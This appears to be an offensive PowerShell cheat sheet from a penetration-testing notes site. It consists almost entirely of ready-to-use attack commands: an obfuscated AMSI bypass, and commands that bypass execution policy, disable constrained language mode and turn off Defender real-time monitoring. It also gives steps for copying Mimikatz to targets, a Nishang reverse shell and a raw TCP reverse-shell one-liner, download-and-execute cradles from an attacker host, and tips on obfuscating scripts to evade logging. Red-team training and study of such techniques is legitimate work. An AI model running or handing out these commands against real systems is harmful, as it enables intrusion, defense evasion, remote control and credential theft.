Offensive Powershell

Pass Creds

1
# If you have RDP access and can get a prompt
2
$cred = Get-Credential Domain\Username
3
invoke-command -Credential $cred -computername x -scriptblock {whoami}
4
โ€‹
5
# If you are over C2 and cant get a prompt
6
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}
Copied!

AMSI Bypass

1
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Copied!

Execution Policy

1
powershell -ep bypass
Copied!

Help

1
Get-Help
Copied!

Checking Language Mode

1
$ExecutionContext.SessionState.LanguageMode
Copied!
When constrained can add the functions at end of script.
E.G: Putting "invoke-mimikatz" and the end of Invoke-Mimikatz.ps1 to call it since language wont let you.

Disabling Constrained Language Mode

Note: This only works if its set locally. Needs to be run as system and is two underscores.
1
# Check (4 = constrained, 8 = unconstrained)
2
$env:__PSLockDownPolicy
3
โ€‹
4
# Change
5
setx __PSLockdownPolicy "8" /M
Copied!

Applocker Policy

1
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Copied!

Disable Defender

1
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Copied!

Copy File to target

1
Copy-Item .\Invoke-Mimikatz.ps1 \\target.local\c$\'Program Files'
2
Copy-Item C:\file C:\Users\target\ -ToSession $sess
3
Copy-Item C:\Users\target\file C:\ -FromSession $sess
Copied!

Reverse Shell Nishang

1
powershell.exe iex (iwr http://172.16.100.218/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.218 -Port 443)
Copied!
Might need to modify nishang script first so that the function name is correct.

Reverse Shell Listener

1
Import-Module .\powercat.ps1
2
powercat -l -v -p 443
Copied!

Reverse Shell One Liner

1
$client = New-Object System.Net.Sockets.TCPClient("172.16.1.23",6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Copied!

IEX

1
powershell.exe iex (iwr http://attacker.ip/Script.ps1 -UseBasicParsing); script-function -arg1 -arg2
2
โ€‹
3
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://attacker.ip/Script.ps1'))
Copied!

Ping Sweep

1
# Sweep computers in a /24 subnet
2
1..255 | % {"192.168.1.$($_): $(Test-Connection -count 1 -comp 192.168.1.$($_) -quiet)"}
Copied!

Testing Ports

1
Test-NetConnection -ComputerName <name> -Port <port>
2
โ€‹
3
# Nishang
4
Invoke-PortScan -StartAddress <IP> -EndAddress <IP> [-PortScan] [-Port <>]
Copied!

Obfuscation

Obfuscation defeats script block logging, warning level auto logging and AMSI when done right. As a very simple example, we have already seen how GetField becomes GetFiel`d to bypass warning level auto logging. Invoke-Obfuscation and Invoke-CradleCrafter from Daniel (https://github.com/danielbohannon) are very useful for implementing obfuscation.
Obfuscated scripts can be spotted by comparing common characteristics like variable names, function names, character frequency, distribution of language operators, entropy etc. Revoke-Obfusction (https://github.com/danielbohannon/RevokeObfuscation) is one such tool for identifying obfuscated scripts from event logs. Bonus: To avoid detection of obfuscation we can use minimal obfuscation by identifying the exact signature which gets detected and obfuscating only that part of the script. See: https://cobbr.io/PSAmsiMinimizing-Obfuscation-To-Maximize-Stealth.htmlโ€‹
Last modified 10mo ago